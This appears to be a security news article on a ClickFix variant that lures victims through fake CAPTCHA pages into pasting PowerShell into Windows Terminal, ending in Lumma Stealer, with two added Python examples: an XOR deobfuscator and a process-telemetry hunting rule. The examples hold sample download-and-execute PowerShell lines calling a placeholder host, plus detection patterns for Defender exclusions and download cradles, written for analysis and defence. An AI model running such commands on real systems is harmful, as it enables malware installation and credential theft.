NEWS: A CAPTCHA with a double meaning. How a simple "verify you are not a robot" check turns into a spyware installation.

pinkman

Attackers have found a way to outsmart even the most cautious users.
Microsoft researchers have identified a new wave of social engineering in which attackers have modified the well-known ClickFix technique. Instead of having the victim launch the malicious command from the Run dialog (Windows key + R), the criminals now steer them into Windows Terminal. This makes the action look like routine administration and helps it slip past controls tuned to the Run dialog.

The Microsoft Defender Experts team reported that the activity was detected in February 2026. The scheme begins with instructions to the victim that are dressed up as a routine check or troubleshooting procedure. The user is told to open the Quick Link menu by pressing Windows key + X, select Terminal or PowerShell, paste the clipboard contents (which the malicious page has already placed there) and press Enter.

Because these steps look like ordinary administrator actions, they arouse less suspicion. Many security products detect abuse of the Run dialog (its history is written to the RunMRU registry key, a common ClickFix hunting artifact), but far fewer watch for the same paste into a Terminal window, so the attack evades part of the detection stack.

The PowerShell commands are delivered through fake CAPTCHA pages, "verification" pop-ups, or pseudo-troubleshooting instructions. At first glance these pages look like normal web interface elements, so victims often follow the suggested steps.

Once the pasted command runs, a chain of further processes is launched. One of them decodes an embedded command that is hex-encoded and XOR-obfuscated. The resulting script then downloads a copy of the legitimate 7-Zip utility under a different file name and uses it to unpack the components of the multi-stage attack.
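As an added example (not code from the Microsoft report or the article), the following Python shows how an analyst unpacks a hex-encoded, XOR-obfuscated stage of the kind described above. The report does not state the key length or the decode routine the loader uses; a single-byte key, a plain hex string, the sample command, the URL and the key value 0x5A are all assumptions made here for illustration. The key-recovery routine goes one step beyond the text: it brute-forces the key from the blob alone when the loader's key is not at hand.

```python
"""Added example, not code from the Microsoft report or the article: unpacking
a hex-encoded, XOR-obfuscated stage such as the one the first process decodes.
The report does not describe the key length or decode routine; a single-byte
key and a plain hex string are assumptions made here for illustration."""
from itertools import cycle
from typing import Optional, Tuple


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def obfuscate(command: str, key: bytes) -> str:
    """Loader side: XOR the command, then hex-encode so it survives as a string literal."""
    return xor_bytes(command.encode("utf-8"), key).hex()


def deobfuscate(hex_blob: str, key: bytes) -> str:
    """Analyst side: reverse the two layers in the opposite order."""
    return xor_bytes(bytes.fromhex(hex_blob), key).decode("utf-8", errors="replace")


def _printable_ratio(data: bytes) -> float:
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / max(len(data), 1)


def recover_single_byte_key(hex_blob: str,
                            cribs: Tuple[bytes, ...] = (b"powershell", b"IEX", b"http")) -> Optional[int]:
    """Brute-force a one-byte XOR key when only the blob is at hand. Candidates are
    scored by how much decodes to printable ASCII plus a bonus for each crib (a
    substring one expects in a downloader command, matched case-sensitively so a
    case-flipping key 0x20 away from the real one does not score the same)."""
    raw = bytes.fromhex(hex_blob)
    best_key, best_score = None, 0.0
    for k in range(256):
        candidate = xor_bytes(raw, bytes([k]))
        score = _printable_ratio(candidate) + 0.5 * sum(crib in candidate for crib in cribs)
        if score > best_score:
            best_key, best_score = k, score
    # Demand fully printable output plus at least one crib before trusting the key.
    return best_key if best_score >= 1.5 else None


# Constructed sample stage: the command, the URL and the key 0x5A are made up here.
SAMPLE_COMMAND = ("powershell -w hidden -c IEX((New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/a'))")
SAMPLE_KEY = bytes([0x5A])
SAMPLE_BLOB = obfuscate(SAMPLE_COMMAND, SAMPLE_KEY)

if __name__ == "__main__":
    recovered = recover_single_byte_key(SAMPLE_BLOB)
    print("blob:", SAMPLE_BLOB[:32] + "...")
    print("recovered key:", None if recovered is None else hex(recovered))
    if recovered is not None:
        print(deobfuscate(SAMPLE_BLOB, bytes([recovered])))
```

The crib list is deliberately case-sensitive: a key that is 0x20 off from the real one flips letter case and still yields mostly printable text, so a case-insensitive match would rank it almost as high as the correct key. For multi-byte keys the same scoring works per key position once the key length is known.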

Later stages download additional modules, create scheduled tasks for persistence, and add exclusions to Microsoft Defender. The tooling also collects information about the infected host and its network environment. The final component is a Lumma Stealer module, which injects code into Chrome and Edge processes via QueueUserAPC (APC injection). From inside the browser it can read the Web Data and Login Data files, the SQLite databases in which saved form data and credentials are stored.
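The detection gap described above (Terminal as the launch point, then Defender exclusions, scheduled tasks and a renamed 7-Zip) is the kind of thing a hunting rule over process-creation telemetry can close. The following Python is an added example, not code from Microsoft or the article: field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, OriginalFileName), the sample events are constructed for this example, and the paths, hex blob and URL in them are illustrative assumptions rather than indicators from the report.

```python
"""Added example, not code from Microsoft or the article: a small hunting rule
over process-creation telemetry for the Terminal-based ClickFix variant
described above. Field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine, OriginalFileName). The events below are constructed for this
example; file paths and indicators are illustrative assumptions, not IOCs
from the report."""
import re
from typing import Dict, List, Tuple

# WindowsTerminal.exe is the usual parent of a shell opened from Win+X; OpenConsole.exe
# is included as the terminal's console host so either form of the lineage is caught.
TERMINAL_HOSTS = {"windowsterminal.exe", "openconsole.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SEVENZIP_NAMES = {"7z.exe", "7za.exe", "7zg.exe"}

# Command-line indicators; each rule is (tag, compiled regex).
RULES = [
    ("defender_exclusion", re.compile(r"add-mppreference\s+-exclusion", re.I)),
    ("scheduled_task", re.compile(r"schtasks(?:\.exe)?\s+/create|register-scheduledtask", re.I)),
    ("hex_blob", re.compile(r"(?:[0-9a-f]{2}){40,}", re.I)),          # 80+ hex chars in one run
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\b(?:iwr|irm|curl)\b", re.I)),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the indicator tags that fire on one process-creation event."""
    tags: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Win+X -> Terminal -> paste: the shell's parent is the terminal process,
    # whereas a Win+R launch shows up under explorer.exe.
    if parent in TERMINAL_HOSTS and image in SHELLS:
        tags.append("shell_under_terminal")
    for tag, pattern in RULES:
        if pattern.search(cmd):
            tags.append(tag)
    # A renamed copy of 7-Zip keeps its PE version info: OriginalFileName still
    # says 7z.exe even though the file on disk is called something else.
    original = event.get("OriginalFileName", "").lower()
    if original in SEVENZIP_NAMES and image != original:
        tags.append("renamed_7zip")
    return tags


def is_suspicious(tags: List[str]) -> bool:
    """Admins open Terminal via Win+X all day, so the parent alone is not an
    alert: require a behavioural indicator on top of it, or a strong one alone."""
    strong = {"defender_exclusion", "scheduled_task", "renamed_7zip"}
    if strong & set(tags):
        return True
    return "shell_under_terminal" in tags and bool({"hex_blob", "download_cradle"} & set(tags))


def hunt(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if is_suspicious(tags):
            hits.append((i, tags))
    return hits


# Constructed sample telemetry (paths, blob and URL are made up for the example).
HEX_BLOB = bytes(range(48)).hex()   # 96 hex characters standing in for the obfuscated stage
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},                     # benign
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x\WindowsTerminal.exe",
     "CommandLine": f"powershell -w hidden -c \"$h='{HEX_BLOB}'; IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x'))\""},             # pasted stage 1
    {"Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "7z.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\svc.exe x C:\Users\Public\pkg.dat -oC:\Users\Public"},  # renamed 7-Zip
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoP -c Add-MpPreference -ExclusionPath C:\Users\Public"},   # exclusion
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x\WindowsTerminal.exe",
     "CommandLine": "powershell.exe Get-Process"},                                 # admin at the keyboard
]

if __name__ == "__main__":
    for index, tags in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(tags)}")
```

Event 4 is the deliberate false-positive check: an administrator who opened Terminal from Win+X and ran a harmless cmdlet is tagged but not alerted on, while the pasted stage (event 1), the renamed archiver (event 2) and the Defender exclusion (event 3) are. The OriginalFileName comparison is the general trick for any "legitimate tool, renamed" stage, not just 7-Zip.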

The researchers also identified an alternative chain. Here the pasted PowerShell command downloads a .bat file, which uses cmd.exe to write a VBScript. That script is executed through MSBuild and connects to RPC nodes of blockchain networks, which points to the EtherHiding technique: the next stage or its location is stored on a public blockchain, so the malicious infrastructure sits behind services that are hard to block or take down.

Microsoft notes that Microsoft Defender's built-in protections detect many elements of the campaign. Still, the new scheme shows how social engineering keeps evolving: attackers increasingly disguise malicious actions as normal system operations to win the victim's trust and reduce the chance of detection.